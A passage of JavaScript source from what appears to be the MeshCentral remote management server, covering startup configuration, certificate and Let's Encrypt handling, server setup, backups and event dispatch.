if (obj.config.domains[i].newaccountsrights && (typeof (obj.config.domains[i].newaccountsrights) != 'number')) { delete obj.config.domains[i].newaccountsrights; }
// Check if there is a web views path and/or web public path for this domain
if ((__dirname.endsWith('/node_modules/meshcentral')) || (__dirname.endsWith('\\node_modules\\meshcentral')) || (__dirname.endsWith('/node_modules/meshcentral/')) || (__dirname.endsWith('\\node_modules\\meshcentral\\'))) {
if ((obj.config.domains[i].webviewspath == null) && (obj.fs.existsSync(obj.path.join(__dirname, '../../meshcentral-web-' + i + '/views')))) { obj.config.domains[i].webviewspath = obj.path.join(__dirname, '../../meshcentral-web-' + i + '/views'); }
if ((obj.config.domains[i].webpublicpath == null) && (obj.fs.existsSync(obj.path.join(__dirname, '../../meshcentral-web-' + i + '/public')))) { obj.config.domains[i].webpublicpath = obj.path.join(__dirname, '../../meshcentral-web-' + i + '/public'); }
if ((obj.config.domains[i].webemailspath == null) && (obj.fs.existsSync(obj.path.join(__dirname, '../../meshcentral-web-' + i + '/emails')))) { obj.config.domains[i].webemailspath = obj.path.join(__dirname, '../../meshcentral-web-' + i + '/emails'); }
} else {
if ((obj.config.domains[i].webviewspath == null) && (obj.fs.existsSync(obj.path.join(__dirname, '../meshcentral-web-' + i + '/views')))) { obj.config.domains[i].webviewspath = obj.path.join(__dirname, '../meshcentral-web-' + i + '/views'); }
if ((obj.config.domains[i].webpublicpath == null) && (obj.fs.existsSync(obj.path.join(__dirname, '../meshcentral-web-' + i + '/public')))) { obj.config.domains[i].webpublicpath = obj.path.join(__dirname, '../meshcentral-web-' + i + '/public'); }
if ((obj.config.domains[i].webemailspath == null) && (obj.fs.existsSync(obj.path.join(__dirname, '../meshcentral-web-' + i + '/emails')))) { obj.config.domains[i].webemailspath = obj.path.join(__dirname, '../meshcentral-web-' + i + '/emails'); }
}
}
// Log passed arguments into Windows Service Log
//if (obj.servicelog != null) { var s = ''; for (i in obj.args) { if (i != '_') { if (s.length > 0) { s += ', '; } s += i + "=" + obj.args[i]; } } logInfoEvent('MeshServer started with arguments: ' + s); }
// Look at passed in arguments
if ((obj.args.user != null) && (typeof obj.args.user != 'string')) { delete obj.args.user; }
if ((obj.args.ciralocalfqdn != null) && ((obj.args.lanonly == true) || (obj.args.wanonly == true))) { addServerWarning("CIRA local FQDN's ignored when server in LAN-only or WAN-only mode."); }
if ((obj.args.ciralocalfqdn != null) && (obj.args.ciralocalfqdn.split(',').length > 4)) { addServerWarning("Can't have more than 4 CIRA local FQDN's. Ignoring value."); obj.args.ciralocalfqdn = null; }
if (obj.args.ignoreagenthashcheck === true) { addServerWarning("Agent hash checking is being skipped, this is unsafe."); }
if (obj.args.port == null || typeof obj.args.port != 'number') { if (obj.args.notls == null) { obj.args.port = 443; } else { obj.args.port = 80; } }
if (obj.args.aliasport != null && (typeof obj.args.aliasport != 'number')) obj.args.aliasport = null;
if (obj.args.mpsport == null || typeof obj.args.mpsport != 'number') obj.args.mpsport = 4433;
if (obj.args.mpsaliasport != null && (typeof obj.args.mpsaliasport != 'number')) obj.args.mpsaliasport = null;
if (obj.args.rediraliasport != null && (typeof obj.args.rediraliasport != 'number')) obj.args.rediraliasport = null;
if (obj.args.notls == null && obj.args.redirport == null) obj.args.redirport = 80;
if (obj.args.minifycore === 0) obj.args.minifycore = false;
if (typeof args.agentidletimeout != 'number') { args.agentidletimeout = 150000; } else { args.agentidletimeout *= 1000 } // Default agent idle timeout is 2m, 30sec.
// Setup a site administrator
if ((obj.args.admin) && (typeof obj.args.admin == 'string')) {
var adminname = obj.args.admin.split('/');
if (adminname.length == 1) { adminname = 'user//' + adminname[0]; }
else if (adminname.length == 2) { adminname = 'user/' + adminname[0] + '/' + adminname[1]; }
else { console.log("Invalid administrator name."); process.exit(); return; }
obj.db.Get(adminname, function (err, user) {
if (user.length != 1) { console.log("Invalid user name."); process.exit(); return; }
user[0].siteadmin = 4294967295; // 0xFFFFFFFF
obj.db.Set(user[0], function () {
if (user[0].domain == '') { console.log('User ' + user[0].name + ' set to site administrator.'); } else { console.log("User " + user[0].name + " of domain " + user[0].domain + " set to site administrator."); }
process.exit();
return;
});
});
return;
}
// Remove a site administrator
if ((obj.args.unadmin) && (typeof obj.args.unadmin == 'string')) {
var adminname = obj.args.unadmin.split('/');
if (adminname.length == 1) { adminname = 'user//' + adminname[0]; }
else if (adminname.length == 2) { adminname = 'user/' + adminname[0] + '/' + adminname[1]; }
else { console.log("Invalid administrator name."); process.exit(); return; }
obj.db.Get(adminname, function (err, user) {
if (user.length != 1) { console.log("Invalid user name."); process.exit(); return; }
if (user[0].siteadmin) { delete user[0].siteadmin; }
obj.db.Set(user[0], function () {
if (user[0].domain == '') { console.log("User " + user[0].name + " is not a site administrator."); } else { console.log("User " + user[0].name + " of domain " + user[0].domain + " is not a site administrator."); }
process.exit();
return;
});
});
return;
}
// Perform other database cleanup
obj.db.cleanup();
// Set all nodes to power state of unknown (0)
obj.db.storePowerEvent({ time: new Date(), nodeid: '*', power: 0, s: 1 }, obj.multiServer); // s:1 indicates that the server is starting up.
// Read or setup database configuration values
obj.db.Get('dbconfig', function (err, dbconfig) {
if (dbconfig.length == 1) { obj.dbconfig = dbconfig[0]; } else { obj.dbconfig = { _id: 'dbconfig', version: 1 }; }
if (obj.dbconfig.amtWsEventSecret == null) { obj.crypto.randomBytes(32, function (err, buf) { obj.dbconfig.amtWsEventSecret = buf.toString('hex'); obj.db.Set(obj.dbconfig); }); }
// This is used by the user to create a username/password for a Intel AMT WSMAN event subscription
if (obj.args.getwspass) {
if (obj.args.getwspass.length == 64) {
obj.crypto.randomBytes(6, function (err, buf) {
while (obj.dbconfig.amtWsEventSecret == null) { process.nextTick(); }
var username = buf.toString('hex');
var nodeid = obj.args.getwspass;
var pass = obj.crypto.createHash('sha384').update(username.toLowerCase() + ':' + nodeid + ':' + obj.dbconfig.amtWsEventSecret).digest('base64').substring(0, 12).split('/').join('x').split('\\').join('x');
console.log("--- Intel(r) AMT WSMAN eventing credentials ---");
console.log("Username: " + username);
console.log("Password: " + pass);
console.log("Argument: " + nodeid);
process.exit();
});
} else {
console.log("Invalid NodeID.");
process.exit();
}
return;
}
// Start plugin manager if configuration allows this.
if ((obj.config) && (obj.config.settings) && (obj.config.settings.plugins != null) && (obj.config.settings.plugins != false) && ((typeof obj.config.settings.plugins != 'object') || (obj.config.settings.plugins.enabled != false))) {
const nodeVersion = Number(process.version.match(/^v(\d+\.\d+)/)[1]);
if (nodeVersion < 7) {
addServerWarning("Plugin support requires Node v7.x or higher.");
delete obj.config.settings.plugins;
} else {
obj.pluginHandler = require('./pluginHandler.js').pluginHandler(obj);
}
}
// Load the default meshcore and meshcmd
obj.updateMeshCore();
obj.updateMeshCmd();
// Setup and start the redirection server if needed. We must start the redirection server before Let's Encrypt.
if ((obj.args.redirport != null) && (typeof obj.args.redirport == 'number') && (obj.args.redirport != 0)) {
obj.redirserver = require('./redirserver.js').CreateRedirServer(obj, obj.db, obj.args, obj.StartEx2);
} else {
obj.StartEx2(); // If not needed, move on.
}
});
}
// Done starting the redirection server, go on to load the server certificates
obj.StartEx2 = function () {
// Load server certificates
obj.certificateOperations = require('./certoperations.js').CertificateOperations(obj);
obj.certificateOperations.GetMeshServerCertificate(obj.args, obj.config, function (certs) {
// Get the current node version
const nodeVersion = Number(process.version.match(/^v(\d+\.\d+)/)[1]);
if ((obj.config.letsencrypt == null) || (obj.redirserver == null) || (nodeVersion < 8)) {
obj.StartEx3(certs); // Just use the configured certificates
} else if ((obj.config.letsencrypt != null) && (obj.config.letsencrypt.nochecks == true)) {
// Use Let's Encrypt with no checking
obj.letsencrypt = require('./letsencrypt.js').CreateLetsEncrypt(obj);
obj.letsencrypt.getCertificate(certs, obj.StartEx3); // Use Let's Encrypt with no checking, use at your own risk.
} else {
// Check Let's Encrypt settings
var leok = true;
if (typeof obj.config.letsencrypt.email != 'string') { leok = false; addServerWarning("Missing Let's Encrypt email address."); }
else if (typeof obj.config.letsencrypt.names != 'string') { leok = false; addServerWarning("Invalid Let's Encrypt host names."); }
else if (obj.config.letsencrypt.names.indexOf('*') >= 0) { leok = false; addServerWarning("Invalid Let's Encrypt names, can't contain a *."); }
else if (obj.config.letsencrypt.email.split('@').length != 2) { leok = false; addServerWarning("Invalid Let's Encrypt email address."); }
else if (obj.config.letsencrypt.email.trim() !== obj.config.letsencrypt.email) { leok = false; addServerWarning("Invalid Let's Encrypt email address."); }
else {
var le = require('./letsencrypt.js');
try { obj.letsencrypt = le.CreateLetsEncrypt(obj); } catch (ex) { console.log(ex); }
if (obj.letsencrypt == null) { addServerWarning("Unable to setup Let's Encrypt module."); leok = false; }
}
if (leok == true) {
// Check that the email address domain MX resolves.
require('dns').resolveMx(obj.config.letsencrypt.email.split('@')[1], function (err, addresses) {
if (err == null) {
// Check that all names resolve
checkResolveAll(obj.config.letsencrypt.names.split(','), function (err) {
if (err == null) {
obj.letsencrypt.getCertificate(certs, obj.StartEx3); // Use Let's Encrypt
} else {
for (var i in err) { addServerWarning("Invalid Let's Encrypt names, unable to resolve: " + err[i]); }
obj.StartEx3(certs); // Let's Encrypt did not load, just use the configured certificates
}
});
} else {
addServerWarning("Invalid Let's Encrypt email address, unable to resolve: " + obj.config.letsencrypt.email.split('@')[1]);
obj.StartEx3(certs); // Let's Encrypt did not load, just use the configured certificates
}
});
} else {
obj.StartEx3(certs); // Let's Encrypt did not load, just use the configured certificates
}
}
});
};
// Start the server with the given certificates, but check if we have web certificates to load
obj.StartEx3 = function (certs) {
obj.certificates = certs;
obj.certificateOperations.acceleratorStart(certs); // Set the state of the accelerators
// Load any domain web certificates
for (var i in obj.config.domains) {
// Load any Intel AMT ACM activation certificates
obj.certificateOperations.loadIntelAmtAcmCerts(obj.config.domains[i].amtacmactivation);
if (typeof obj.config.domains[i].certurl == 'string') {
obj.supportsProxyCertificatesRequest = true; // If a certurl is set, enable proxy cert requests
// Then, fix the URL and add 'https://' if needed
if (obj.config.domains[i].certurl.indexOf('://') < 0) { obj.config.domains[i].certurl = 'https://' + obj.config.domains[i].certurl; }
}
}
if (obj.supportsProxyCertificatesRequest == true) { obj.updateProxyCertificates(true); }
obj.StartEx4(); // Keep going
}
// Start the server with the given certificates
obj.StartEx4 = function () {
var i;
// If the certificate is un-configured, force LAN-only mode
if (obj.certificates.CommonName.indexOf('.') == -1) { /*console.log('Server name not configured, running in LAN-only mode.');*/ obj.args.lanonly = true; }
// Write server version and run mode
var productionMode = (process.env.NODE_ENV && (process.env.NODE_ENV == 'production'));
var runmode = (obj.args.lanonly ? 2 : (obj.args.wanonly ? 1 : 0));
console.log("MeshCentral v" + getCurrentVerion() + ', ' + (["Hybrid (LAN + WAN) mode", "WAN mode", "LAN mode"][runmode]) + (productionMode ? ", Production mode." : '.'));
// Check that no sub-domains have the same DNS as the parent
for (i in obj.config.domains) {
if ((obj.config.domains[i].dns != null) && (obj.certificates.CommonName.toLowerCase() === obj.config.domains[i].dns.toLowerCase())) {
console.log("ERROR: Server sub-domain can't have same DNS name as the parent."); process.exit(0); return;
}
}
// Load the list of mesh agents and install scripts
if (obj.args.noagentupdate == 1) { for (i in obj.meshAgentsArchitectureNumbers) { obj.meshAgentsArchitectureNumbers[i].update = false; } }
obj.updateMeshAgentsTable(function () {
obj.updateMeshAgentInstallScripts();
// Setup and start the web server
obj.crypto.randomBytes(48, function (err, buf) {
// Setup Mesh Multi-Server if needed
obj.multiServer = require('./multiserver.js').CreateMultiServer(obj, obj.args);
if (obj.multiServer != null) {
if ((obj.db.databaseType != 3) || (obj.db.changeStream != true)) { console.log("ERROR: Multi-server support requires use of MongoDB with ReplicaSet and ChangeStream enabled."); process.exit(0); return; }
obj.serverId = obj.multiServer.serverid;
for (var serverid in obj.config.peers.servers) { obj.peerConnectivityByNode[serverid] = {}; }
}
// If the server is set to "nousers", allow only loopback unless IP filter is set
if ((obj.args.nousers == true) && (obj.args.userallowedip == null)) { obj.args.userallowedip = "::1,127.0.0.1"; }
// Set the session length to 60 minutes if not set and set a random key if needed
if ((obj.args.sessiontime != null) && ((typeof obj.args.sessiontime != 'number') || (obj.args.sessiontime < 1))) { delete obj.args.sessiontime; }
if (!obj.args.sessionkey) { obj.args.sessionkey = buf.toString('hex').toUpperCase(); }
// Create APF server to hook into webserver
obj.apfserver = require('./apfserver.js').CreateApfServer(obj, obj.db, obj.args);
// Create MQTT Broker to hook into webserver and mpsserver
if ((typeof obj.config.settings.mqtt == 'object') && (typeof obj.config.settings.mqtt.auth == 'object') && (typeof obj.config.settings.mqtt.auth.keyid == 'string') && (typeof obj.config.settings.mqtt.auth.key == 'string')) { obj.mqttbroker = require("./mqttbroker.js").CreateMQTTBroker(obj, obj.db, obj.args); }
// Start the web server and if needed, the redirection web server.
obj.webserver = require('./webserver.js').CreateWebServer(obj, obj.db, obj.args, obj.certificates);
if (obj.redirserver != null) { obj.redirserver.hookMainWebServer(obj.certificates); }
// Setup the Intel AMT event handler
obj.amtEventHandler = require('./amtevents.js').CreateAmtEventsHandler(obj);
// Setup the Intel AMT local network scanner
if (obj.args.wanonly != true) {
obj.amtScanner = require('./amtscanner.js').CreateAmtScanner(obj).start();
obj.meshScanner = require('./meshscanner.js').CreateMeshScanner(obj).start();
}
// Setup and start the MPS server
if ((obj.args.lanonly != true) && (obj.args.mpsport !== 0)) {
obj.mpsserver = require('./mpsserver.js').CreateMpsServer(obj, obj.db, obj.args, obj.certificates);
}
// Setup and start the legacy swarm server
if ((obj.certificates.swarmserver != null) && (obj.args.swarmport !== 0)) {
if (obj.args.swarmport == null) { obj.args.swarmport = 8080; }
obj.swarmserver = require('./swarmserver.js').CreateSwarmServer(obj, obj.db, obj.args, obj.certificates);
}
// Setup email server
if ((obj.config.smtp != null) && (obj.config.smtp.host != null) && (obj.config.smtp.from != null)) {
obj.mailserver = require('./meshmail.js').CreateMeshMail(obj);
obj.mailserver.verify();
if (obj.args.lanonly == true) { addServerWarning("SMTP server has limited use in LAN mode."); }
}
// Start periodic maintenance
obj.maintenanceTimer = setInterval(obj.maintenanceActions, 1000 * 60 * 60); // Run this every hour
// Dispatch an event that the server is now running
obj.DispatchEvent(['*'], obj, { etype: 'server', action: 'started', msg: 'Server started' });
// Plugin hook. Need to run something at server startup? This is the place.
if (obj.pluginHandler) { obj.pluginHandler.callHook('server_startup'); }
// Setup the login cookie encryption key
if ((obj.config) && (obj.config.settings) && (typeof obj.config.settings.logincookieencryptionkey == 'string')) {
// We have a string, hash it and use that as a key
try { obj.loginCookieEncryptionKey = Buffer.from(obj.config.settings.logincookieencryptionkey, 'hex'); } catch (ex) { }
if ((obj.loginCookieEncryptionKey == null) || (obj.loginCookieEncryptionKey.length != 80)) { addServerWarning("Invalid \"LoginCookieEncryptionKey\" in config.json."); obj.loginCookieEncryptionKey = null; }
}
// Login cookie encryption key not set, use one from the database
if (obj.loginCookieEncryptionKey == null) {
obj.db.Get('LoginCookieEncryptionKey', function (err, docs) {
if ((docs.length > 0) && (docs[0].key != null) && (obj.args.logintokengen == null) && (docs[0].key.length >= 160)) {
obj.loginCookieEncryptionKey = Buffer.from(docs[0].key, 'hex');
} else {
obj.loginCookieEncryptionKey = obj.generateCookieKey(); obj.db.Set({ _id: 'LoginCookieEncryptionKey', key: obj.loginCookieEncryptionKey.toString('hex'), time: Date.now() });
}
});
}
// Load the invitation link encryption key from the database
obj.db.Get('InvitationLinkEncryptionKey', function (err, docs) {
if ((docs.length > 0) && (docs[0].key != null) && (docs[0].key.length >= 160)) {
obj.invitationLinkEncryptionKey = Buffer.from(docs[0].key, 'hex');
} else {
obj.invitationLinkEncryptionKey = obj.generateCookieKey(); obj.db.Set({ _id: 'InvitationLinkEncryptionKey', key: obj.invitationLinkEncryptionKey.toString('hex'), time: Date.now() });
}
});
// Start collecting server stats every 5 minutes
setInterval(function () {
obj.serverStatsCounter++;
var hours = 720; // Start with all events lasting 30 days.
if (((obj.serverStatsCounter) % 2) == 1) { hours = 3; } // Half of the event get removed after 3 hours.
else if ((Math.floor(obj.serverStatsCounter / 2) % 2) == 1) { hours = 8; } // Another half of the event get removed after 8 hours.
else if ((Math.floor(obj.serverStatsCounter / 4) % 2) == 1) { hours = 24; } // Another half of the event get removed after 24 hours.
else if ((Math.floor(obj.serverStatsCounter / 8) % 2) == 1) { hours = 48; } // Another half of the event get removed after 48 hours.
else if ((Math.floor(obj.serverStatsCounter / 16) % 2) == 1) { hours = 72; } // Another half of the event get removed after 72 hours.
var expire = new Date();
expire.setTime(expire.getTime() + (60 * 60 * 1000 * hours));
var data = {
time: new Date(),
expire: expire,
mem: process.memoryUsage(),
//cpu: process.cpuUsage(),
conn: {
ca: Object.keys(obj.webserver.wsagents).length,
cu: Object.keys(obj.webserver.wssessions).length,
us: Object.keys(obj.webserver.wssessions2).length,
rs: obj.webserver.relaySessionCount
}
};
if (obj.mpsserver != null) { data.conn.am = Object.keys(obj.mpsserver.ciraConnections).length; }
if (obj.firstStats === true) { delete obj.firstStats; data.first = true; }
obj.db.SetServerStats(data); // Save the stats to the database
obj.DispatchEvent(['*'], obj, { action: 'servertimelinestats', data: data }); // Event the server stats
}, 300000);
obj.debug('main', "Server started");
if (obj.args.nousers == true) { obj.updateServerState('nousers', '1'); }
obj.updateServerState('state', "running");
// Setup auto-backup defaults
if (obj.config.settings.autobackup == null) { obj.config.settings.autobackup = { backupintervalhours: 24, keeplastdaysbackup: 10 }; }
else if (obj.config.settings.autobackup === false) { delete obj.config.settings.autobackup; }
// Setup users that can see all device groups
obj.config.settings.managealldevicegroups = [];
for (i in obj.config.domains) { if (Array.isArray(obj.config.domains[i].managealldevicegroups)) { for (var j in obj.config.domains[i].managealldevicegroups) { if (typeof obj.config.domains[i].managealldevicegroups[j] == 'string') { obj.config.settings.managealldevicegroups.push('user/' + i + '/' + obj.config.domains[i].managealldevicegroups[j]); } } } }
});
});
};
// Refresh any certificate hashs from the reverse proxy
obj.pendingProxyCertificatesRequests = 0;
obj.lastProxyCertificatesRequest = null;
obj.supportsProxyCertificatesRequest = false;
obj.updateProxyCertificates = function (force) {
if (force !== true) {
if ((obj.pendingProxyCertificatesRequests > 0) || (obj.supportsProxyCertificatesRequest == false)) return;
if ((obj.lastProxyCertificatesRequest != null) && ((Date.now() - obj.lastProxyCertificatesRequest) < 120000)) return; // Don't allow this call more than every 2 minutes.
obj.lastProxyCertificatesRequest = Date.now();
}
// Load any domain web certificates
for (var i in obj.config.domains) {
if (obj.config.domains[i].certurl != null) {
// Load web certs
obj.pendingProxyCertificatesRequests++;
var dnsname = obj.config.domains[i].dns;
if ((dnsname == null) && (obj.config.settings.cert != null)) { dnsname = obj.config.settings.cert; }
obj.certificateOperations.loadCertificate(obj.config.domains[i].certurl, dnsname, obj.config.domains[i], function (url, cert, xhostname, xdomain) {
obj.pendingProxyCertificatesRequests--;
if (cert != null) {
// Hash the entire cert
var hash = obj.crypto.createHash('sha384').update(Buffer.from(cert, 'binary')).digest('hex');
if (xdomain.certhash != hash) { // The certificate has changed.
xdomain.certkeyhash = hash;
xdomain.certhash = hash;
try {
// Decode a RSA certificate and hash the public key, if this is not RSA, skip this.
var forgeCert = obj.certificateOperations.forge.pki.certificateFromAsn1(obj.certificateOperations.forge.asn1.fromDer(cert));
xdomain.certkeyhash = obj.certificateOperations.forge.pki.getPublicKeyFingerprint(forgeCert.publicKey, { md: obj.certificateOperations.forge.md.sha384.create(), encoding: 'hex' });
//console.log('V1: ' + xdomain.certkeyhash);
} catch (ex) {
delete xdomain.certkeyhash;
}
if (obj.webserver) {
obj.webserver.webCertificateHashs[xdomain.id] = obj.webserver.webCertificateFullHashs[xdomain.id] = Buffer.from(hash, 'hex').toString('binary');
if (xdomain.certkeyhash != null) { obj.webserver.webCertificateHashs[xdomain.id] = Buffer.from(xdomain.certkeyhash, 'hex').toString('binary'); }
// Disconnect all agents with bad web certificates
for (var i in obj.webserver.wsagentsWithBadWebCerts) { obj.webserver.wsagentsWithBadWebCerts[i].close(1); }
}
console.log(obj.common.format("Loaded web certificate from \"{0}\", host: \"{1}\"", url, xhostname));
console.log(obj.common.format(" SHA384 cert hash: {0}", xdomain.certhash));
if ((xdomain.certkeyhash != null) && (xdomain.certhash != xdomain.certkeyhash)) { console.log(obj.common.format(" SHA384 key hash: {0}", xdomain.certkeyhash)); }
}
} else {
console.log(obj.common.format("Failed to load web certificate at: \"{0}\", host: \"{1}\"", url, xhostname));
}
});
}
}
}
// Perform maintenance operations (called every hour)
obj.maintenanceActions = function () {
// Check for self-update that targets a specific version
if ((typeof obj.args.selfupdate == 'string') && (getCurrentVerion() === obj.args.selfupdate)) { obj.args.selfupdate = false; }
// Check if we need to perform server self-update
if ((obj.args.selfupdate) && (obj.serverSelfWriteAllowed == true)) {
obj.db.getValueOfTheDay('performSelfUpdate', 1, function (performSelfUpdate) {
if (performSelfUpdate.value > 0) {
performSelfUpdate.value--;
obj.db.Set(performSelfUpdate);
obj.getLatestServerVersion(function (currentVer, latestVer) { if (currentVer != latestVer) { obj.performServerUpdate(); return; } });
} else {
checkAutobackup();
}
});
} else {
checkAutobackup();
}
};
// Check if we need to perform an automatic backup
function checkAutobackup() {
if (obj.config.settings.autobackup && (typeof obj.config.settings.autobackup.backupintervalhours == 'number')) {
obj.db.Get('LastAutoBackupTime', function (err, docs) {
if (err != null) return;
var lastBackup = 0, now = new Date().getTime();
if (docs.length == 1) { lastBackup = docs[0].value; }
var delta = now - lastBackup;
if (delta > (obj.config.settings.autobackup.backupintervalhours * 60 * 60 * 1000)) {
// A new auto-backup is required.
obj.db.Set({ _id: 'LastAutoBackupTime', value: now }); // Save the current time in the database
obj.db.performBackup(); // Perform the backup
}
});
}
}
// Stop the Meshcentral server
obj.Stop = function (restoreFile) {
// If the database is not setup, exit now.
if (!obj.db) return;
// Dispatch an event saying the server is now stopping
obj.DispatchEvent(['*'], obj, { etype: 'server', action: 'stopped', msg: "Server stopped" });
// Set all nodes to power state of unknown (0)
obj.db.storePowerEvent({ time: new Date(), nodeid: '*', power: 0, s: 2 }, obj.multiServer, function () { // s:2 indicates that the server is shutting down.
if (restoreFile) {
obj.debug('main', obj.common.format("Server stopped, updating settings: {0}", restoreFile));
console.log("Updating settings folder...");
var yauzl = require('yauzl');
yauzl.open(restoreFile, { lazyEntries: true }, function (err, zipfile) {
if (err) throw err;
zipfile.readEntry();
zipfile.on('entry', function (entry) {
if (/\/$/.test(entry.fileName)) {
// Directory file names end with '/'.
// Note that entires for directories themselves are optional.
// An entry's fileName implicitly requires its parent directories to exist.
zipfile.readEntry();
} else {
// file entry
zipfile.openReadStream(entry, function (err, readStream) {
if (err) throw err;
readStream.on('end', function () { zipfile.readEntry(); });
// console.log('Extracting:', obj.getConfigFilePath(entry.fileName));
readStream.pipe(obj.fs.createWriteStream(obj.getConfigFilePath(entry.fileName)));
});
}
});
zipfile.on('end', function () { setTimeout(function () { obj.fs.unlinkSync(restoreFile); process.exit(123); }); });
});
} else {
obj.debug('main', "Server stopped");
process.exit(0);
}
});
// Update the server state
obj.updateServerState('state', "stopped");
};
// Event Dispatch
obj.AddEventDispatch = function (ids, target) {
obj.debug('dispatch', 'AddEventDispatch', ids);
for (var i in ids) { var id = ids[i]; if (!obj.eventsDispatch[id]) { obj.eventsDispatch[id] = [target]; } else { obj.eventsDispatch[id].push(target); } }
};
obj.RemoveEventDispatch = function (ids, target) {
obj.debug('dispatch', 'RemoveEventDispatch', id);
for (var i in ids) { var id = ids[i]; if (obj.eventsDispatch[id]) { var j = obj.eventsDispatch[id].indexOf(target); if (j >= 0) { if (obj.eventsDispatch[id].length == 1) { delete obj.eventsDispatch[id]; } else { obj.eventsDispatch[id].splice(j, 1); } } } }
};
obj.RemoveEventDispatchId = function (id) {
obj.debug('dispatch', 'RemoveEventDispatchId', id);
if (obj.eventsDispatch[id] != null) { delete obj.eventsDispatch[id]; }
};
obj.RemoveAllEventDispatch = function (target) {
obj.debug('dispatch', 'RemoveAllEventDispatch');
for (var i in obj.eventsDispatch) { var j = obj.eventsDispatch[i].indexOf(target); if (j >= 0) { if (obj.eventsDispatch[i].length == 1) { delete obj.eventsDispatch[i]; } else { obj.eventsDispatch[i].splice(j, 1); } } }
};
obj.DispatchEvent = function (ids, source, event, fromPeerServer) {
// If the database is not setup, exit now.
if (!obj.db) return;
// Send event to syslog is needed
if (obj.syslog && event.msg) { obj.syslog.log(obj.syslog.LOG_INFO, event.msg); }
if (obj.syslogjson) { obj.syslogjson.log(obj.syslogjson.LOG_INFO, JSON.stringify(event)); }
obj.debug('dispatch', 'DispatchEvent', ids);
if ((typeof event == 'object') && (!event.nolog)) {
event.time = new Date();
// The event we store is going to skip some of the fields so we don't store too much stuff in the database.
var storeEvent = Object.assign({}, event);
if (storeEvent.node) { delete storeEvent.node; } // Skip the "node" field. May skip more in the future.
if (storeEvent.links) {
// Escape "links" names that may have "." and/or "$"
storeEvent.links = Object.assign({}, storeEvent.links);
for (var i in storeEvent.links) { var ue = obj.common.escapeFieldName(i); if (ue !== i) { storeEvent.links[ue] = storeEvent.links[i]; delete storeEvent.links[i]; } }
}
storeEvent.ids = ids;
obj.db.StoreEvent(storeEvent);
}
var targets = []; // List of targets we dispatched the event to, we don't want to dispatch to the same target twice.
for (var j in ids) {
var id = ids[j];
if (obj.eventsDispatch[id]) {
for (var i in obj.eventsDispatch[id]) {
if (targets.indexOf(obj.eventsDispatch[id][i]) == -1) { // Check if we already displatched to this target
targets.push(obj.eventsDispatch[id][i]);
try { obj.eventsDispatch[id][i].HandleEvent(source, event, ids, id); } catch (ex) {
console.log(ex, obj.eventsDispatch[id][i]);
}
}
}
}
}
if ((fromPeerServer == null) && (obj.multiServer != null) && ((typeof event != 'object') || (event.nopeers != 1))) { obj.multiServer.DispatchEvent(ids, source, event); }
};
// Get the connection state of a node
obj.GetConnectivityState = function (nodeid) { return obj.connectivityByNode[nodeid]; };
// Get the routing server id for a given node and connection type, can never be self.
obj.GetRoutingServerId = function (nodeid, connectType) {
if (obj.multiServer == null) return null;
for (var serverid in obj.peerConnectivityByNode) {
if (serverid == obj.serverId) continue;
var state = obj.peerConnectivityByNode[serverid][nodeid];
if ((state != null) && ((state.connectivity & connectType) != 0)) { return { serverid: serverid, meshid: state.meshid }; }
}
return null;
};
// Update the connection state of a node when in multi-server mode
// Update obj.connectivityByNode using obj.peerConnectivityByNode for the list of nodes in argument
obj.UpdateConnectivityState = function (nodeids) {
for (var nodeid in nodeids) {
var meshid = null, state = null, oldConnectivity = 0, oldPowerState = 0, newConnectivity = 0, newPowerState = 0;
var oldState = obj.connectivityByNode[nodeid];
if (oldState != null) { meshid = oldState.meshid; oldConnectivity = oldState.connectivity; oldPowerState = oldState.powerState; }
for (var serverid in obj.peerConnectivityByNode) {
var peerState = obj.peerConnectivityByNode[serverid][nodeid];
if (peerState != null) {
if (state == null) {
// Copy the state
state = {};
newConnectivity = state.connectivity = peerState.connectivity;
newPowerState = state.powerState = peerState.powerState;
meshid = state.meshid = peerState.meshid;
//if (peerState.agentPower) { state.agentPower = peerState.agentPower; }
//if (peerState.ciraPower) { state.ciraPower = peerState.ciraPower; }
//if (peerState.amtPower) { state.amtPower = peerState.amtPower; }
} else {
// Merge the state
state.connectivity |= peerState.connectivity;
newConnectivity = state.connectivity;
if ((peerState.powerState != 0) && ((state.powerState == 0) || (peerState.powerState < state.powerState))) { newPowerState = state.powerState = peerState.powerState; }
meshid = state.meshid = peerState.meshid;
//if (peerState.agentPower) { state.agentPower = peerState.agentPower; }
//if (peerState.ciraPower) { state.ciraPower = peerState.ciraPower; }
//if (peerState.amtPower) { state.amtPower = peerState.amtPower; }
}
}
}
obj.connectivityByNode[nodeid] = state;
//console.log('xx', nodeid, meshid, newConnectivity, oldPowerState, newPowerState, oldPowerState);
// Event any changes on this server only
if ((newConnectivity != oldPowerState) || (newPowerState != oldPowerState)) {
obj.DispatchEvent(obj.webserver.CreateNodeDispatchTargets(meshid, nodeid), obj, { action: 'nodeconnect', meshid: meshid, nodeid: nodeid, domain: nodeid.split('/')[1], conn: newConnectivity, pwr: newPowerState, nolog: 1, nopeers: 1 });
}
}
};
// Set the connectivity state of a node and setup the server so that messages can be routed correctly.
// meshId: mesh identifier of format mesh/domain/meshidhex
// nodeId: node identifier of format node/domain/nodeidhex
// connectTime: time of connection, milliseconds elapsed since the UNIX epoch.
// connectType: Bitmask, 1 = MeshAgent, 2 = Intel AMT CIRA, 4 = Intel AMT local, 8 = Intel AMT Relay, 16 = MQTT
// powerState: Value, 0 = Unknown, 1 = S0 power on, 2 = S1 Sleep, 3 = S2 Sleep, 4 = S3 Sleep, 5 = S4 Hibernate, 6 = S5 Soft-Off, 7 = Present
//var connectTypeStrings = ['', 'MeshAgent', 'Intel AMT CIRA', '', 'Intel AMT local', '', '', '', 'Intel AMT Relay', '', '', '', '', '', '', '', 'MQTT'];
//var powerStateStrings = ['Unknown', 'Powered', 'Sleep', 'Sleep', 'Deep Sleep', 'Hibernating', 'Soft-Off', 'Present'];
obj.SetConnectivityState = function (meshid, nodeid, connectTime, connectType, powerState, serverid) {
//console.log('SetConnectivity for ' + nodeid.substring(0, 16) + ', Type: ' + connectTypeStrings[connectType] + ', Power: ' + powerStateStrings[powerState] + (serverid == null ? ('') : (', ServerId: ' + serverid)));
if ((serverid == null) && (obj.multiServer != null)) { obj.multiServer.DispatchMessage({ action: 'SetConnectivityState', meshid: meshid, nodeid: nodeid, connectTime: connectTime, connectType: connectType, powerState: powerState }); }
if (obj.multiServer == null) {
// Single server mode
// Change the node connection state
var eventConnectChange = 0;
var state = obj.connectivityByNode[nodeid];
if (state) {
// Change the connection in the node and mesh state lists
